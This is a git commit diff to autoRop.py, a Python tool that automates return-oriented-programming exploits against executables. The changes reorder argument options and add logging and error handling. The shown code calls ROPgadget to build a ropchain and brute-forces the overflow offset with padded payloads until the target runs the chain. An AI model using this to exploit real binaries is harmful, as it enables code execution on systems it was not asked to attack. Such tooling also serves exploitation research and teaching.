readme stuff

2020-12-11 11:53:47 +00:00
parent 055b787c2d
commit f13ef70767
13 changed files with 143 additions and 63 deletions
--- a/autoRop.py
+++ b/autoRop.py
@ -36,14 +36,14 @@ print(r'''

 arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
 arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
-arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
-arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
-arg_parser.add_argument("--min_payload", metavar="min", default=0, type=int, help="The minimum payload length to try")
-arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
-arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
-arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
+arg_parser.add_argument("--exec_args_file", metavar="exec_args_file", default="exec_args.json", type=str, help="The path to the file containing the arguments to pass to the executable. Put $PAYLOAD$ where you want the payload to be placed. (default: exec_args.json)")
+arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary (default: arg)")
 arg_parser.add_argument("--interactive", action="store_true", default=False, help="Automatically run the ROP on the executable")
-arg_parser.add_argument("--exec_args_file", metavar="exec_args_file", default="exec_args.json", type=str, help="The path to the file containing the arguments to pass to the executable. Put $PAYLOAD$ where you want the payload to be placed.")
+arg_parser.add_argument("--min_payload", metavar="min", default=0, type=int, help="The minimum payload length to try (default: 0)")
+arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try (default: 16384)")
+arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run (default: rop_exec.json)")
+arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file (default: rop.txt)")
+arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")

 args = arg_parser.parse_args()

@ -67,43 +67,50 @@ def run_program(payload: str, **kwargs) -> process:
    p = None
    if input_method == 'arg':
        exec_args[payload_idx] = payload
-        p = process([f'./{exec_file}'] + exec_args, **kwargs)
+        p = process([f'{exec_file}'] + exec_args, **kwargs)
    elif input_method == 'file':
        with open('/tmp/input.txt', 'wb') as f:
            f.write(payload)
            f.flush()
            exec_args[payload_idx] = '/tmp/input.txt'
-            p = process([f'./{exec_file}'] + exec_args, **kwargs)
+            p = process([f'{exec_file}'] + exec_args, **kwargs)
    elif input_method == 'stdin':
-        p = process([f'./{exec_file}'] + exec_args, **kwargs)
+        p = process([f'{exec_file}'] + exec_args, **kwargs)
        p.send(payload)
    
    return p

 def find_offset_inc(low: int, high: int):
    default_padding = 64
+    tmp_rop = '/tmp/rop_file' 
    print(f"  ├─[🤔] Generating offset discovery payload...")
-    subprocess.run(
+    result = subprocess.run(
        [
            "ROPgadget",
            "--binary", exec_file,
            "--ropchain",
            "--silent",
            "--paddingLen", str(default_padding),
-            "--ropFile", '/tmp/rop_file',
+            "--ropFile", tmp_rop,
            "--execFile", 'rop_exec_default.json',
        ],
-        stdout = subprocess.DEVNULL
+        stdout = subprocess.PIPE
    )
-    with open('/tmp/rop_file', 'rb') as f:
-        original_payload = f.read()[default_padding:]
-        for i in range(low, high + 1):
-            print(f"  ├─[🤔] Trying offset {i}...")
-            rop_payload = (b'A' * i) + original_payload
-            proc = run_program(rop_payload)
-            if b'[ Successful ROP! ]' in proc.readall():
-                print(f"  └─[😳] Found offset at {i}!\n")
-                return i
+    with open("log/ropgadget.log", "wb") as f:
+        f.write(result.stdout)
+
+    try: 
+        with open(tmp_rop, 'rb') as f:
+            original_payload = f.read()[default_padding:]
+            for i in range(low, high + 1):
+                print(f"  ├─[🤔] Trying offset {i}...")
+                rop_payload = (b'A' * i) + original_payload
+                proc = run_program(rop_payload)
+                if b'[ Successful ROP! ]' in proc.readall():
+                    print(f"  └─[😳] Found offset at {i}!\n")
+                    return i
+    except FileNotFoundError as e:
+        print(f"  └─[😥] Could not find {e.filename}, check log/ropgadget.log for details")

    return -1